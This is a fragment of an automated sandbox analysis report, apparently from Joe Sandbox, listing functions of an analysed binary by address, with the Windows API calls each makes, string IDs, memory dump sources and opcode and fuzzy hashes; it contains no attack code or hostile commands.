                    • Opcode ID: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                    • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                    • Opcode Fuzzy Hash: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                    • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                    Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                    • _memset.LIBCMT ref: 00462B87
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                    • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                    • Opcode Fuzzy Hash: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                    • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                    Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: 3cA$_A
                    • API String ID: 2620147621-3480954128
                    • Opcode ID: 29ba2e6d6ac1f8e982579788886c3a5f766b12424a56cb2cacd2ebd99f17abb9
                    • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                    • Opcode Fuzzy Hash: 29ba2e6d6ac1f8e982579788886c3a5f766b12424a56cb2cacd2ebd99f17abb9
                    • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                    Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: 3cA$ERCP
                    • API String ID: 2532777613-1471582817
                    • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                    • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                    • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                    • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                    Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004627C0
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                    • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                    • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                    • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                    Function 0047D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                      • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 48841afb82c51e77e65a662f9d15771e824929b8a1eaa9af7586ff6945600f8e
                    • Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
                    • Opcode Fuzzy Hash: 48841afb82c51e77e65a662f9d15771e824929b8a1eaa9af7586ff6945600f8e
                    • Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95
                    Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: e030b1596512d39921eca084f9a774937031f989f7830630dd714e1b2177fac3
                    • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                    • Opcode Fuzzy Hash: e030b1596512d39921eca084f9a774937031f989f7830630dd714e1b2177fac3
                    • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                    Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                    • LoadLibraryW.KERNEL32(?), ref: 00486468
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                    • DestroyWindow.USER32(?), ref: 00486485
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                    • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                    • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                    • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                    Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                    • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                    • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                    • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                    • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                    Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                    • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                    • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                    • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                    • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                    Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                    • __swprintf.LIBCMT ref: 0046ACC1
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                    • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                    • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                    • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                    Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID: @F
                    • API String ID: 2875609808-2781531706
                    • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                    • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                    • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                    • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                    Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                    • CloseHandle.KERNEL32(?), ref: 0047EDEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                    • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                    • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                    • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                    Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                    • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                    • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                    • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                    • Opcode Fuzzy Hash: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                    • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                    Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                    • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                    • Opcode Fuzzy Hash: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                    • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                    Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
